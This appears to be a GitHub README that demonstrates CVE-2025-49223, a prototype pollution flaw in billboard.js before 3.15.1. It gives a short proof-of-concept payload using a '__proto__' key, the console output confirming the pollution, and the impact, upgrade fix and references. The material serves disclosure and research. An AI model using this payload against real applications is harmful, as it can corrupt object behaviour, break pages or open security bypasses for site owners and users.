# 💥 CVE-2025-49223 - Prototype Pollution in Billboard.js

> billboard.js before 3.15.1 was discovered to contain a prototype pollution via the function `generate`, which could allow attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.

This repository demonstrates a **Prototype Pollution vulnerability** found in [billboard.js](https://github.com/naver/billboard.js) versions **prior to 3.15.1**, disclosed as **CVE-2025-49223**.

---

## 📌 Summary

- **Vulnerability Type**: Prototype Pollution
- **Affected Library**: [billboard.js](https://github.com/naver/billboard.js)
- **Affected Versions**: `<= 3.14.0`
- **Fixed Version**: `>= 3.15.1`
- **CVE ID**: [CVE-2025-49223](https://nvd.nist.gov/vuln/detail/CVE-2025-49223)
- **Impact**: execute arbitrary code or cause a Denial of Service

---

## 🧪 Proof of Concept (PoC)

Open [`index.html`](./index.html) in a browser and check the console log for prototype pollution attempts.

### Load vulnerable version:

```html
<script src="https://cdn.jsdelivr.net/npm/billboard.js@3.14.0/dist/billboard.pkgd.min.js"></script>
````

### Pollution Attempt:

```js
{
  ["__proto__"]: {
    polluted: "polluted_via_string_key"
  }
}
```

### Console Output:

```
🔥 string key '__proto__' -> POLLUTED! Value: polluted_via_string_key
```

This confirms that an attacker can pollute `Object.prototype`, impacting any future object created across the page.

---

## 🔥 Impact

Successful exploitation may lead to:

* Arbitrary key injection into all objects
* Tampering with chart rendering logic
* Application crashes (DoS)
* Potential for security bypass in apps relying on unsafe object merging

---



---

## 🛡️ Mitigation

* ✅ Upgrade to `billboard.js` version **3.15.1 or later**


---

## 🧱 References


* 🔗 [CVE-2025-49223 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-49223)
* 🔗 [Billboard.js 3.15.1 Release Notes](https://github.com/naver/billboard.js/releases/tag/3.15.1)


---


---

> ⚠️ **Disclaimer:** This PoC is for educational and research purposes only. Use responsibly.

